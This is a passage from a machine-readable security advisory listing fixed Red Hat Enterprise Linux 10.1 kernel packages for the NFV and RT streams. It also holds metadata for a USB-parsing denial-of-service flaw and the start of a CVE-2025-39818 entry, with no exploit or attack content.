"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Denial of Service via out-of-bounds read in USB configuration parsing"
},
{
"cve": "CVE-2025-39818",
"cwe": {
"id": "CWE-763",
"name": "Release of Invalid Pointer or Reference"
},
"discovery_date": "2025-09-16T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2395797"
}
],
"notes": [
{
"category": "description",
